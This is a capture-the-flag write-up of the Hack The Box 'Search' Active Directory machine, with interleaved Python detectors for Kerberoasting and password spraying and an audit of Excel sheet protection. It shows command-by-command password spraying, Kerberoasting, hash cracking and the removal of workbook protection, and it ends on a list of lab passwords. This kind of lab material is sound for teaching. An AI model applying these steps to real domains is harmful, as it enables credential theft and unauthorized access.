htb-search

Search was a classic Active Directory Windows box. It starts by finding credentials in an image on the website, which I'll use to dump the domain's LDAP and find a Kerberoastable user. From there it's a chain of pivots, each one yielding another clue: spraying for password reuse, credentials in an Excel workbook, and access to a PowerShell Web Access portal protected by a client certificate. With that initial shell, it's a few hops identified through Bloodhound, including recovering a GMSA password, to get to domain admin.

Enumeration

┌──(puck㉿kali)-[~/htb/search]
└─$ nmap -Pn -sV --script "ldap* and not brute*" -p 389 10.10.11.129
Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-21 16:08 CET
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 16:08 (0:00:01 remaining)
Nmap scan report for 10.10.11.129
Host is up (0.0095s latency).

Bug in ldap-brute: no string output.
PORT    STATE SERVICE VERSION
389/tcp open  ldap    Microsoft Windows Active Directory LDAP (Domain: search.htb, Site: Default-First-Site-Name)
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=search,DC=htb
|       ldapServiceName: search.htb:research$@SEARCH.HTB
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
--snip--
|       supportedCapabilities: 1.2.840.113556.1.4.2237
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=search,DC=htb
|       serverName: CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=search,DC=htb
|       namingContexts: DC=search,DC=htb
|       namingContexts: CN=Configuration,DC=search,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=search,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=search,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=search,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 241860
|       dsServiceName: CN=NTDS Settings,CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
|       dnsHostName: Research.search.htb
|       defaultNamingContext: DC=search,DC=htb
|       currentTime: 20250321151737.0Z
|_      configurationNamingContext: CN=Configuration,DC=search,DC=htb
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 555.37 seconds
                                                                                                                      

add 10.10.11.129 search.htb to /etc/hosts

In the image on the website, the August 17 entry says 'Send password to Hope Sharp', and the password IsolationIsKey? is written next to it. That gives a name and a password for the Hope Sharp user. The same password can also be sprayed against any other accounts found later.

Credential Brute Force

I have a name and a password from the image above. I’ll create a list of possible usernames from Hope Sharp in a file hope.txt:

hope
sharp
h.sharp
hope.s
hope.sharp
hopesharp

Now I can pass that list to netexec (nxc, the successor to crackmapexec) along with the password, and it finds a match:

┌──(puck㉿kali)-[~/htb/search]
└─$ nxc smb 10.10.11.129 -u hope.txt -p IsolationIsKey? --continue-on-success
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\sharp:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\h.sharp:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope.s:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey? 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hopesharp:IsolationIsKey? STATUS_LOGON_FAILURE 

Authenticated

There are a bunch of shares on the host:

┌──(puck㉿kali)-[~/htb/search]
└─$ smbmap -u hope.sharp -p IsolationIsKey? -H 10.10.11.129 --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.11.129:445	Name: search.htb          	Status: Authenticated
    Disk                                                  	Permissions	Comment
    ----                                                  	-----------	-------
    ADMIN$                                            	NO ACCESS	Remote Admin
    C$                                                	NO ACCESS	Default share
    CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
    helpdesk                                          	NO ACCESS	
    IPC$                                              	READ ONLY	Remote IPC
    NETLOGON                                          	READ ONLY	Logon server share 
    RedirectedFolders$                                	READ, WRITE	
    SYSVOL                                            	READ ONLY	Logon server share 

The CertEnroll share has some .crl files and other certificate related stuff that isn’t useful.

I am able to connect to helpdesk, but not list anything in it.

NETLOGON is empty.

RedirectedFolders$ has a bunch of users:

┌──(puck㉿kali)-[~/htb/search]
└─$ smbclient //10.10.11.129/RedirectedFolders$ -U hope.sharp --password=IsolationIsKey? 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Fri Mar 21 16:53:13 2025
  ..                                 Dc        0  Fri Mar 21 16:53:13 2025
  abril.suarez                       Dc        0  Tue Apr  7 20:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 15:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 14:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 20:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 14:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 20:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 15:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 14:02:04 2020
  dax.santiago                       Dc        0  Tue Apr  7 20:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 13:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 22:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 14:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 20:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 20:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 16:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 20:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 15:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 22:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 13:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 20:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 14:21:42 2020
  sierra.frye                        Dc        0  Thu Nov 18 02:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 22:14:26 2020

        3246079 blocks of size 4096. 768625 blocks available
smb: \> 

I’m able to read files in hope.sharp’s dir:

smb: \> ls hope.sharp\
  .                                  Dc        0  Thu Apr  9 10:34:41 2020
  ..                                 Dc        0  Thu Apr  9 10:34:41 2020
  Desktop                           DRc        0  Thu Apr  9 10:35:49 2020
  Documents                         DRc        0  Thu Apr  9 10:35:50 2020
  Downloads                         DRc        0  Thu Apr  9 10:35:49 2020

                5085183 blocks of size 4096. 2165892 blocks available
smb: \> ls hope.sharp\Desktop\
  .                                 DRc        0  Thu Apr  9 10:35:49 2020
  ..                                DRc        0  Thu Apr  9 10:35:49 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      282  Thu Apr  9 10:35:00 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 10:35:38 2020

                5085183 blocks of size 4096. 2165892 blocks available

But not inside the other users:

smb: \> ls trace.ryan\
  .                                  Dc        0  Thu Apr  9 16:14:26 2020
  ..                                 Dc        0  Thu Apr  9 16:14:26 2020
  Desktop                           DRc        0  Fri Jul 31 07:40:32 2020
  Documents                         DRc        0  Fri Jul 31 07:40:32 2020
  Downloads                         DRc        0  Fri Jul 31 07:40:32 2020

                5085183 blocks of size 4096. 2165892 blocks available
smb: \> ls trace.ryan\Desktop\
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Desktop\

I can get a list of users to potentially use down the road.

The SYSVOL share has standard stuff, but nothing that is useful.

LDAP – TCP 389

ldapdomaindump

Raw LDAP output can be read manually, but ldapdomaindump is a nicer tool for visualizing LDAP data. I'll create an ldap directory for the output, and then run it:

puck@kali$ ldapdomaindump -u search.htb\\hope.sharp -p 'IsolationIsKey?' 10.10.11.129 -o ldap/
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

This creates a set of files in HTML, JSON, and grepable formats:

puck@kali$ ls ldap/
domain_computers_by_os.html  domain_computers.json  domain_groups.json  domain_policy.json  domain_trusts.json          domain_users.html
domain_computers.grep        domain_groups.grep     domain_policy.grep  domain_trusts.grep  domain_users_by_group.html  domain_users.json
domain_computers.html        domain_groups.html     domain_policy.html  domain_trusts.html  domain_users.grep

There’s a bunch of information here. For one, the Tristan.Davies account is the domain administrator:

The description says “The only Domain Admin allowed, Administrator will soon be disabled”. This account seems like a target for later.

There’s a bunch of accounts labeled as “HelpDesk User” and different location-based helpdesk groups:

There's another account, web_svc, which is described as "Temp Account created by HelpDesk":

Bloodhound

With creds I can run bloodhound.py against the domain. There are many computer objects registered in AD that I can't connect to, which produces a lot of errors:

bloodhound-python -u Hope.Sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb -c All --zip

INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 106 users
INFO: Found 63 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
----------SNIP----------

The LDAP server name research.search.htb is a vhost; add it to the hosts file as well. Now the dump can be visualized in the BloodHound GUI: start neo4j, start BloodHound, and upload the zip.

puck@parrot-lt$ sudo neo4j console

puck@parrot-lt$ bloodhound

Upload all the dumped data.

This is the shortest path to domain admin. However, we don't have access to any of the users who are members of 'ITSEC'. We have the 'Hope Sharp' user, but she isn't a member of ITSEC. Looking for Kerberoastable accounts instead turns up two.

This 'Web_svc' account was created by HelpDesk and is temporary. It is used by a web service, so it is a service account.

Its SPN is set, so we can Kerberoast it: request a service ticket as a regular domain user and extract the service account's credential (a crackable hash) from the ticket, without ever contacting the system hosting the service; only the KDC is involved.

https://swarm.ptsecurity.com/kerberoasting-without-spns/

$> GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/Hope.Sharp:IsolationIsKey?
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation 
---------------------------------  -------  --------  --------------------------  ---------  ----------
RESEARCH/web_svc.search.htb:60001  web_svc            2020-04-09 12:59:11.329031  <never>               

$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$893ce4d4fcc86c204faebe423b7e32e2$688d48c511824

We have the TGS hash for the web_svc service account. Let's try to crack it with hashcat.

$> hashcat -m 13100 web_svc_hash /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...
--------SNIP--------
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$e53619cf90ce49f28580953ec9f6ae63$13d69c419359f
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
--------SNIP--------
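From the domain controller's side, the request above is a single Event ID 4769 (service ticket requested) with TicketEncryptionType 0x17, because the `-request` asks for an RC4 ticket so the output matches hashcat mode 13100. As an added example, not part of this write-up or of any vendor product, here is a small Python detector for that signature over constructed 4769 records: a successful RC4 service-ticket request for a service whose owner is a user account rather than a computer account or krbtgt. Field names follow the Security log's XML; the sample events, the svc_backup name and the source addresses are constructed.

```python
"""Flag Kerberoast-style TGS requests in Windows Security Event ID 4769 records.

Signature used here: a successful TGS request (Status 0x0) for a service whose
account is a *user* (not a computer account ending in '$', not krbtgt) with
TicketEncryptionType 0x17 (RC4-HMAC), which is what a `-request` against an
etype-23 hash looks like from the DC's side.
"""
import json
from collections import defaultdict

RC4_HMAC = "0x17"

# Constructed sample events (JSON lines, Security-log field names). Not real log data.
SAMPLE_4769 = """\
{"EventID": 4769, "TargetUserName": "hope.sharp@SEARCH.HTB", "ServiceName": "web_svc", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.10.14.5"}
{"EventID": 4769, "TargetUserName": "hope.sharp@SEARCH.HTB", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.10.14.5"}
{"EventID": 4769, "TargetUserName": "hope.sharp@SEARCH.HTB", "ServiceName": "RESEARCH$", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.10.14.5"}
{"EventID": 4769, "TargetUserName": "RESEARCH$@SEARCH.HTB", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::1"}
{"EventID": 4769, "TargetUserName": "edgar.jacobs@SEARCH.HTB", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x1b", "IpAddress": "::ffff:10.10.14.7"}
{"EventID": 4768, "TargetUserName": "hope.sharp", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.10.14.5"}
"""


def is_user_service_account(service_name: str) -> bool:
    """Computer accounts end in '$' and krbtgt is the KDC itself; neither is a Kerberoast target."""
    short = service_name.split("@")[0].split("/")[0]
    return not short.endswith("$") and short.lower() != "krbtgt"


def kerberoast_candidates(jsonl: str) -> list[dict]:
    """Return every 4769 record matching the RC4-to-user-service signature."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        # Only successful service-ticket requests are useful to an attacker.
        if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
            continue
        if str(ev.get("TicketEncryptionType", "")).lower() != RC4_HMAC:
            continue
        if not is_user_service_account(ev.get("ServiceName", "")):
            continue
        hits.append({"requester": ev["TargetUserName"], "service": ev["ServiceName"], "source": ev["IpAddress"]})
    return hits


def services_per_requester(hits: list[dict]) -> dict[str, list[str]]:
    """Group hits by requesting principal; one account pulling RC4 tickets for
    several different SPNs in a short period is the classic roast pattern."""
    grouped = defaultdict(set)
    for h in hits:
        grouped[h["requester"]].add(h["service"])
    return {req: sorted(svcs) for req, svcs in grouped.items()}


if __name__ == "__main__":
    found = kerberoast_candidates(SAMPLE_4769)
    for requester, services in services_per_requester(found).items():
        print(f"{requester} requested RC4 service tickets for: {', '.join(services)}")
```

The failed request (Status 0x1b) and the AES (0x12) tickets are deliberately left out so the rule stays quiet on normal traffic. The matching mitigation is to set msDS-SupportedEncryptionTypes on service accounts to AES only and give them long random passwords or make them gMSAs, which is exactly what makes the hash from this box crackable in the first place.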

We have the password for the web_svc service account; let's spray it across all the accounts collected so far (users.txt):

$> crackmapexec smb search.htb -u users.txt -p '@3ONEmillionbaby' --continue-on-success

SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\dave.simpson:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Dax.Santiago:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Keely.Lyons:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Sierra.Frye:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Kyla.Stewart:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Chris.Stewart:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Ben.Thompson:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Kaiara.Spencer:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\abril.suarez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Angie.Duffy:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Antony.Russo:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\belen.compton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cameron.Melendez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\chanel.bell:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Claudia.Pugh:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cortez.Hickman:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\dax.santiago:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Eddie.Stevens:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Edith.Walls:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\eve.galvan:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\frederick.cuevas:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope.sharp:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\jayla.roberts:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Jordan.Gregory:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\payton.harmon:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Reginald.Morton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\santino.benjamin:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Savanah.Velazquez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\sierra.frye:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\trace.ryan:@3ONEmillionbaby STATUS_LOGON_FAILURE

One user account, edgar.jacobs, is using the same password as the service account. Let's look at that user's folder on the share.
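On the domain controller, the spray above shows up as a burst of Event ID 4625 failures from one source against many different accounts, followed by a single 4624 success for the account that reused the password. As an added example, not part of this write-up, here is a Python detector for that pattern over constructed logon records: it groups events by source address, slides a time window over the failures, alerts when the window covers enough distinct accounts, and reports any success from the same source inside that window. The compact record format, the 5-minute window and the 5-account threshold are assumptions for the example, not a vendor log format.

```python
"""Detect a password spray in Windows logon events: one source address failing
against many *distinct* accounts inside a short window, optionally followed by
a success from the same source (the account that reused the sprayed password).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a compact "timestamp event_id source account status"
# form (4625 = failed logon, 4624 = successful logon). Not real log data.
SAMPLE_EVENTS = """\
2025-03-21T16:20:01Z 4625 10.10.14.5 dave.simpson 0xC000006D
2025-03-21T16:20:02Z 4625 10.10.14.5 dax.santiago 0xC000006D
2025-03-21T16:20:03Z 4625 10.10.14.5 keely.lyons 0xC000006D
2025-03-21T16:20:04Z 4625 10.10.14.5 sierra.frye 0xC000006D
2025-03-21T16:20:05Z 4625 10.10.14.5 kyla.stewart 0xC000006D
2025-03-21T16:20:06Z 4625 10.10.14.5 chris.stewart 0xC000006D
2025-03-21T16:20:07Z 4625 10.10.14.5 ben.thompson 0xC000006D
2025-03-21T16:20:08Z 4625 10.10.14.5 kaiara.spencer 0xC000006D
2025-03-21T16:20:09Z 4624 10.10.14.5 edgar.jacobs 0x0
2025-03-21T16:31:00Z 4625 10.10.14.9 hope.sharp 0xC000006D
2025-03-21T16:31:20Z 4625 10.10.14.9 hope.sharp 0xC000006D
2025-03-21T16:31:45Z 4625 10.10.14.9 hope.sharp 0xC000006D
"""


def parse_events(text: str) -> list[dict]:
    """Parse the compact record format into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, event_id, source, account, status = parts
        events.append({
            "time": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "event_id": int(event_id),
            "source": source,
            "account": account.lower(),   # AD logons are case-insensitive
            "status": status,
        })
    return events


def detect_spray(events: list[dict], window: timedelta = timedelta(minutes=5),
                 min_accounts: int = 5) -> list[dict]:
    """One alert per source whose failures cover >= min_accounts distinct accounts within `window`."""
    by_source = defaultdict(list)
    for ev in events:
        if ev["event_id"] in (4624, 4625):
            by_source[ev["source"]].append(ev)

    alerts = []
    for source, evs in by_source.items():
        failures = sorted((e for e in evs if e["event_id"] == 4625), key=lambda e: e["time"])
        best = None          # the window with the most distinct accounts for this source
        start = 0
        for end, last in enumerate(failures):
            while last["time"] - failures[start]["time"] > window:
                start += 1
            accounts = {e["account"] for e in failures[start:end + 1]}
            if len(accounts) >= min_accounts and (best is None or len(accounts) > len(best[2])):
                best = (failures[start]["time"], last["time"], accounts)
        if best is None:
            continue
        first, last_t, accounts = best
        # A success from the same source right after the burst is the reused password.
        successes = sorted({e["account"] for e in evs
                            if e["event_id"] == 4624 and first <= e["time"] <= last_t + window})
        alerts.append({
            "source": source,
            "accounts_tried": len(accounts),
            "first_seen": first.isoformat(),
            "last_seen": last_t.isoformat(),
            "successes_in_window": successes,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The second source in the sample (three failures for one account) is what a user mistyping a password looks like and produces no alert; counting distinct accounts rather than raw failures is what separates a spray from lockout noise, and it is also why a spray like the one above never trips a per-account lockout threshold.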

$> smbclient //search.htb/RedirectedFolders$ -U edgar.jacobs
Enter WORKGROUP\edgar.jacobs's password: @3ONEmillionbaby

Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> ls
  .                                 DRc        0  Mon Aug 10 10:02:16 2020
  ..                                DRc        0  Mon Aug 10 10:02:16 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 20:05:29 2020
  desktop.ini                      AHSc      282  Mon Aug 10 10:02:16 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 20:05:03 2020
  Phishing_Attempt.xlsx              Ac    23130  Mon Aug 10 10:35:44 2020

                3246079 blocks of size 4096. 458055 blocks available
smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx

There's an .xlsx workbook here; download it to your machine.
The workbook has two sheets: one holds the passwords captured in the phishing exercise, the other a list of usernames. The lock symbol on the second sheet shows that it is protected, and the column between lastname and Username is hidden; you can confirm that by resizing the hidden column between columns B and D. There are two ways to get past the protection. The easiest is to upload the file to Google Drive and open it in Google Sheets, which drops the protection for you. To do it by hand, unzip the .xlsx (it is an ordinary zip archive) and delete the following element from xl/worksheets/sheet2.xml:
<sheetProtection algorithmName="SHA-512" hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
Once that line is gone, zip the directory back up:
$> zip -r Phishing.xls .
Open the result in Excel and double-click the column boundary between B and D to unhide the password column.
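The reason deleting one XML element works is worth spelling out: sheetProtection is a UI lock, not encryption. The element stores a salted hash of the "Unprotect Sheet" password, while every cell value sits in plaintext XML inside the zip, hidden column or not. As an added example, not part of this write-up, here is a Python audit that walks a workbook and reports, per sheet, whether protection is set, which hash algorithm it uses, which columns are hidden, and the cell text that is readable regardless; a defender can run it over a file share to find workbooks that rely on sheet protection to hide credentials. The workbook it builds is constructed from the minimal OOXML parts the audit reads, with placeholder hash and salt strings, and is not the file from the box.

```python
"""Audit an .xlsx for worksheets that rely on <sheetProtection>.

Sheet protection only gates Excel's UI: the element stores a salted hash of the
unprotect password, while every cell value sits in plaintext XML inside the zip.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Optional

NS = {
    "m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main",
    "r": "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
    "pr": "http://schemas.openxmlformats.org/package/2006/relationships",
}


def _cell_text(cell) -> Optional[str]:
    """Inline strings and plain values only; shared-string lookups are omitted for brevity."""
    if cell.get("t") == "inlineStr":
        t = cell.find("m:is/m:t", NS)
        return t.text if t is not None else None
    v = cell.find("m:v", NS)
    return v.text if v is not None else None


def audit_sheet_protection(xlsx_bytes: bytes) -> list[dict]:
    """Return one report entry per worksheet, in workbook order."""
    report = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        workbook = ET.fromstring(z.read("xl/workbook.xml"))
        rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
        # Sheet names live in workbook.xml; the part each one maps to lives in the rels file.
        target_by_id = {r.get("Id"): r.get("Target") for r in rels.findall("pr:Relationship", NS)}
        for sheet in workbook.findall("m:sheets/m:sheet", NS):
            target = target_by_id[sheet.get(f"{{{NS['r']}}}id")]
            path = target.lstrip("/") if target.startswith("/") else "xl/" + target
            ws = ET.fromstring(z.read(path))
            prot = ws.find("m:sheetProtection", NS)
            hidden = [c.get("min") for c in ws.findall("m:cols/m:col", NS) if c.get("hidden") == "1"]
            cells = {c.get("r"): _cell_text(c) for c in ws.findall("m:sheetData/m:row/m:c", NS)}
            report.append({
                "sheet": sheet.get("name"),
                "protected": prot is not None,
                "algorithm": prot.get("algorithmName") if prot is not None else None,
                "hidden_columns": hidden,
                "readable_cells": {k: v for k, v in cells.items() if v is not None},
            })
    return report


def build_sample_xlsx() -> bytes:
    """Constructed two-sheet workbook containing only the parts the audit reads.
    Sheet 2 hides column C and carries a sheetProtection element whose hash and
    salt are placeholder strings, not values from any real file."""
    M, R, PR = NS["m"], NS["r"], NS["pr"]
    workbook = (f'<workbook xmlns="{M}" xmlns:r="{R}"><sheets>'
                '<sheet name="Captured" sheetId="1" r:id="rId1"/>'
                '<sheet name="Usernames" sheetId="2" r:id="rId2"/></sheets></workbook>')
    rels = (f'<Relationships xmlns="{PR}">'
            f'<Relationship Id="rId1" Type="{R}/worksheet" Target="worksheets/sheet1.xml"/>'
            f'<Relationship Id="rId2" Type="{R}/worksheet" Target="worksheets/sheet2.xml"/>'
            '</Relationships>')
    sheet1 = (f'<worksheet xmlns="{M}"><sheetData><row r="1">'
              '<c r="A1" t="inlineStr"><is><t>firstname</t></is></c></row></sheetData></worksheet>')
    sheet2 = (f'<worksheet xmlns="{M}"><cols><col min="3" max="3" width="0" hidden="1"/></cols>'
              '<sheetData><row r="2">'
              '<c r="B2" t="inlineStr"><is><t>Harmon</t></is></c>'
              '<c r="C2" t="inlineStr"><is><t>constructed-password</t></is></c>'
              '<c r="D2" t="inlineStr"><is><t>Payton.Harmon</t></is></c></row></sheetData>'
              '<sheetProtection algorithmName="SHA-512" hashValue="PLACEHOLDER_HASH" '
              'saltValue="PLACEHOLDER_SALT" spinCount="100000" sheet="1" objects="1" scenarios="1"/>'
              '</worksheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/_rels/workbook.xml.rels", rels)
        z.writestr("xl/worksheets/sheet1.xml", sheet1)
        z.writestr("xl/worksheets/sheet2.xml", sheet2)
    return buf.getvalue()


if __name__ == "__main__":
    for entry in audit_sheet_protection(build_sample_xlsx()):
        print(entry)
```

The hidden password column is reported with its contents even though the sheet is protected, which is the whole point: the only thing that actually protects a workbook's contents is workbook-level encryption (the "Encrypt with Password" option), not sheet protection.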

firstname lastname password Username
Payton Harmon ;;36!cried!INDIA!year!50;; Payton.Harmon
Cortez Hickman ..10-time-TALK-proud-66.. Cortez.Hickman
Bobby Wolf ??47^before^WORLD^surprise^91?? Bobby.Wolf
Margaret Robinson //51+mountain+DEAR+noise+83// Margaret.Robinson
Scarlett Parks ++47|building|WARSAW|gave|60++ Scarlett.Parks
Eliezer Jordan !!05_goes_SEVEN_offer_83!! Eliezer.Jordan
Hunter Kirby ~~27%when%VILLAGE%full%00~~ Hunter.Kirby
Sierra Frye $$49=wide=STRAIGHT=jordan=28$$18 Sierra.Frye
Annabelle Wells ==95~pass~QUIET~austria~77== Annabelle.Wells
Eve Galvan //61!banker!FANCY!measure!25// Eve.Galvan
